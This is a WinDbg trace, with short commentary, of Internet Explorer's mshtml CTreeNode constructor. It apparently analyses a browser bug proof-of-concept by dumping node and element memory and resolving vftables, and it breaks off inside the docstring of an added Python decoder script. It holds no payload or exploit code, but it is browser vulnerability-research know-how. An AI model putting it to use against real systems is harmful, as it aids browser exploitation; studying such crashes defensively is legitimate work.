mshtml!CTreeNode::CTreeNode+0x89:
6a2bcf59 83e201          and     edx,1
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x8c:
6a2bcf5c 33d6            xor     edx,esi
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=00000008 edi=1af02fd8
eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x8e:
6a2bcf5e 895140          mov     dword ptr [ecx+40h],edx ds:0023:127c7ff0=00000008
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=00000008 edi=1af02fd8
eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e              pop     esi
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=0425e660 edi=1af02fd8
eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x92:
6a2bcf62 5d              pop     ebp
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=0425e660 edi=1af02fd8
eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x93:
6a2bcf63 c20800          ret     8
1:021> dd eax
127c7fb0  1af02fd8 15171fb0 ffff0060 ffffffff
127c7fc0  00000000 00000000 00000000 00000000
127c7fd0  00000000 00000000 00000000 00000000
127c7fe0  00000000 00000000 00000000 00000000
127c7ff0  00000008 00000000 00000000 d0d0d0d0
127c8000  ???????? ???????? ???????? ????????
127c8010  ???????? ???????? ???????? ????????
127c8020  ???????? ???????? ???????? ????????
1:021> dd 1af02fd8
1af02fd8  6a0f70e0 00000002 00000008 00000000
1af02fe8  071faee0 00000000 80000060 00010000
1af02ff8  00000000 18b1cfe8 ???????? ????????
1af03008  ???????? ???????? ???????? ????????
1af03018  ???????? ???????? ???????? ????????
1af03028  ???????? ???????? ???????? ????????
1af03038  ???????? ???????? ???????? ????????
1af03048  ???????? ???????? ???????? ????????
1:021> ln 6a0f70e0
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>

So this CTreeNode belongs to a CPhraseElement (the `sup` element, id_0): the constructor stored edi (the CElement pointer) at node+0, its first argument ([ebp+8], 15171fb0) at node+4, and the element's tag byte from element+0x18 (0x60) at node+8. In other words, `document.body.appendChild(id_0);` in the POC created a CTreeNode for the phrase element. Which node is it linked to through node+4? From the JS we would guess the body object; dump the parent node and the element it points to:

1:021> dd eax
127c7fb0  1af02fd8 15171fb0 ffff0060 ffffffff
127c7fc0  00000000 00000000 00000000 00000000
127c7fd0  00000000 00000000 00000000 00000000
127c7fe0  00000000 00000000 00000000 00000000
127c7ff0  00000008 00000000 00000000 d0d0d0d0
127c8000  ???????? ???????? ???????? ????????
127c8010  ???????? ???????? ???????? ????????
127c8020  ???????? ???????? ???????? ????????
1:021> dd 15171fb0
15171fb0  150e3fd0 1379cfb0 00046210 00090004
15171fc0  00000551 00000008 1515ffc0 15171fd8
15171fd0  1515ffd8 1976dfe0 00000062 00000000
15171fe0  1362afd8 13e48fe0 13e48fe0 1379cfd8
15171ff0  00000008 00000000 00000000 d0d0d0d0
15172000  ???????? ???????? ???????? ????????
15172010  ???????? ???????? ???????? ????????
15172020  ???????? ???????? ???????? ????????
1:021> dd 150e3fd0 
150e3fd0  6a246670 00000005 00000008 07701fe8
150e3fe0  071fae80 15171fb0 00000010 8202e280
150e3ff0  00000002 104d4f00 00000000 d0d0d0d0
150e4000  ???????? ???????? ???????? ????????
150e4010  ???????? ???????? ???????? ????????
150e4020  ???????? ???????? ???????? ????????
150e4030  ???????? ???????? ???????? ????????
150e4040  ???????? ???????? ???????? ????????
1:021> ln 6a246670 
(6a246670)   mshtml!CBodyElement::`vftable'   |  (6a2a9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>

As expected, it is the body object: the parent CTreeNode at 15171fb0 points to an element at 150e3fd0 whose vftable is CBodyElement's.

1:021> r
eax=00000000 ebx=0425e960 ecx=00000005 edx=00000003 esi=0425e950 edi=0425e950
eip=6c77d711 esp=0425e834 ebp=0425e870 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!sin:
6c77d711 ff256810756c    jmp     dword ptr [jscript!_imp__sin (6c751068)] ds:0023:6c751068={msvcrt!sin (773d8aea)}

We have hit our helper debugging statement (the breakpoint on jscript!sin), which marks where we are in the script.

1:021> g
Breakpoint 4 hit
eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi=00001200 edi=00000000
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mshtml!CElement::appendChild:
6a1f20c4 8bff            mov     edi,edi

This break comes from the second appendChild; debug it the same way, stepping through CTreeNode::CTreeNode again:

1:021> g
Breakpoint 4 hit
eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi=00001200 edi=00000000
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mshtml!CElement::appendChild:
6a1f20c4 8bff            mov     edi,edi
1:021> g
Breakpoint 5 hit
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode:
6a2bced0 8bff            mov     edi,edi
1:021> p
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x2:
6a2bced2 55              push    ebp
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x3:
6a2bced3 8bec            mov     ebp,esp
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x5:
6a2bced5 8a450c          mov     al,byte ptr [ebp+0Ch]      ss:0023:0425e59c=00
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x8:
6a2bced8 c0e004          shl     al,4
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0xb:
6a2bcedb 324109          xor     al,byte ptr [ecx+9]        ds:0023:196e2fb9=00
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bcede esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0xe:
6a2bcede 56              push    esi
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8
eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0xf:
6a2bcedf 8b7140          mov     esi,dword ptr [ecx+40h] ds:0023:196e2ff0=00000000
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x12:
6a2bcee2 2410            and     al,10h
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x14:
6a2bcee4 304109          xor     byte ptr [ecx+9],al        ds:0023:196e2fb9=00
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x17:
6a2bcee7 8a5109          mov     dl,byte ptr [ecx+9]        ds:0023:196e2fb9=00
1:021> 
eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bceea esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x1a:
6a2bceea b8ffffffff      mov     eax,0FFFFFFFFh
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bceef esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x1f:
6a2bceef 6689410a        mov     word ptr [ecx+0Ah],ax    ds:0023:196e2fba=0000
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x23:
6a2bcef3 0bc0            or      eax,eax
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x25:
6a2bcef5 83e607          and     esi,7
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8
eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x28:
6a2bcef8 83ce08          or      esi,8
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x2b:
6a2bcefb 6689410c        mov     word ptr [ecx+0Ch],ax    ds:0023:196e2fbc=0000
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bceff esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x2f:
6a2bceff 83c8ff          or      eax,0FFFFFFFFh
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x32:
6a2bcf02 897140          mov     dword ptr [ecx+40h],esi ds:0023:196e2ff0=00000000
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x35:
6a2bcf05 6689410e        mov     word ptr [ecx+0Eh],ax    ds:0023:196e2fbe=0000
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x39:
6a2bcf09 8939            mov     dword ptr [ecx],edi  ds:0023:196e2fb0=00000000
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x3b:
6a2bcf0b 85ff            test    edi,edi
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x3d:
6a2bcf0d 7406            je      mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=0]
1:021> 
eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x3f:
6a2bcf0f 8a4718          mov     al,byte ptr [edi+18h]      ds:0023:07824fe0=75
1:021> 
eax=ffffff75 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x42:
6a2bcf12 884108          mov     byte ptr [ecx+8],al        ds:0023:196e2fb8=00
1:021> 
eax=ffffff75 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x45:
6a2bcf15 8b4508          mov     eax,dword ptr [ebp+8] ss:0023:0425e598=15171fb0
1:021> 
eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x48:
6a2bcf18 894104          mov     dword ptr [ecx+4],eax ds:0023:196e2fb4=00000000
1:021> 
eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x4b:
6a2bcf1b 85ff            test    edi,edi
1:021> 
eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x4d:
6a2bcf1d 0f84f15deaff    je      mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=0]
1:021> 
eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x4f:
6a2bcf23 0fb64108        movzx   eax,byte ptr [ecx+8]       ds:0023:196e2fb8=75
1:021> 
eax=00000075 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x53:
6a2bcf27 e8cd020000      call    mshtml!IsPreLikeTag (6a2bd1f9)
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x5c:
6a2bcf2c 85c0            test    eax,eax
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x5e:
6a2bcf2e 0f95c0          setne   al
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x61:
6a2bcf31 c0e003          shl     al,3
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x64:
6a2bcf34 32c2            xor     al,dl
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x66:
6a2bcf36 2408            and     al,8
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x68:
6a2bcf38 32c2            xor     al,dl
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x6a:
6a2bcf3a 884109          mov     byte ptr [ecx+9],al        ds:0023:196e2fb9=00
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x6d:
6a2bcf3d 85ff            test    edi,edi
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x6f:
6a2bcf3f 0f84d65deaff    je      mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=0]
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x71:
6a2bcf45 0fb64108        movzx   eax,byte ptr [ecx+8]       ds:0023:196e2fb8=75
1:021> 
eax=00000075 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x75:
6a2bcf49 e8ab020000      call    mshtml!IsPreLikeTag (6a2bd1f9)
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x7e:
6a2bcf4e 33d2            xor     edx,edx
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x80:
6a2bcf50 85c0            test    eax,eax
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x82:
6a2bcf52 0f95c2          setne   dl
1:021> 
eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x85:
6a2bcf55 8bc1            mov     eax,ecx
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x87:
6a2bcf57 33d6            xor     edx,esi
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=00000008 edi=07824fc8
eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x89:
6a2bcf59 83e201          and     edx,1
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8
eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x8c:
6a2bcf5c 33d6            xor     edx,esi
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=00000008 edi=07824fc8
eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x8e:
6a2bcf5e 895140          mov     dword ptr [ecx+40h],edx ds:0023:196e2ff0=00000008
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=00000008 edi=07824fc8
eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e              pop     esi
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=0425e660 edi=07824fc8
eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x92:
6a2bcf62 5d              pop     ebp
1:021> 
eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=0425e660 edi=07824fc8
eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x93:
6a2bcf63 c20800          ret     8
1:021> dd eax
196e2fb0  07824fc8 15171fb0 ffff0075 ffffffff
196e2fc0  00000000 00000000 00000000 00000000
196e2fd0  00000000 00000000 00000000 00000000
196e2fe0  00000000 00000000 00000000 00000000
196e2ff0  00000008 00000000 00000000 d0d0d0d0
196e3000  ???????? ???????? ???????? ????????
196e3010  ???????? ???????? ???????? ????????
196e3020  ???????? ???????? ???????? ????????
1:021> dd 07824fc8 
07824fc8  6a11c2e8 00000002 00000008 1506efe8
07824fd8  071faeb0 00000000 80000075 00010000
07824fe8  00000000 18b1cfe8 0e030ff4 00000000
07824ff8  00000000 00000000 ???????? ????????
07825008  ???????? ???????? ???????? ????????
07825018  ???????? ???????? ???????? ????????
07825028  ???????? ???????? ???????? ????????
07825038  ???????? ???????? ???????? ????????
1:021> ln 6a11c2e8 
(6a11c2e8)   mshtml!CGenericElement::`vftable'   |  (6a254ce0)   mshtml!CHeaderElement::`vftable'
Exact matches:
    mshtml!CGenericElement::`vftable' = <no type information>

By the same reasoning, `document.body.appendChild(id_1);` created a CTreeNode for a CGenericElement (the `audio` element, id_1): the node at 196e2fb0 carries tag byte 0x75 and again points to the body node at 15171fb0 as its parent.
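The two CTreeNode walks above (the `sup` node and the `audio` node, each followed up to the body node) are the same manual procedure: read node+0 to get the element, node+4 to get the parent node, node+8 for the tag byte, then resolve the element's vftable. The following script is an added example, not part of the original post or of mshtml, that automates that walk over `dd` output. The offsets it uses are only the ones the CTreeNode::CTreeNode trace actually touches; the vftable-to-class table is copied from the `ln` results in the trace; any other meaning attached to the fields is an assumption and is labelled as such in the comments.

```python
"""Decode CTreeNode / CElement fields from WinDbg `dd` dumps (added example).

Offsets come straight from the CTreeNode::CTreeNode trace on this page:
  node+0x00  CElement*          (mov [ecx],edi)
  node+0x04  parent CTreeNode*  (mov [ecx+4],eax, eax = [ebp+8])
  node+0x08  tag byte           (copied from element+0x18)
  node+0x09  flags byte, node+0x0a/0x0c/0x0e words set to 0xffff
  node+0x40  dword set to 8
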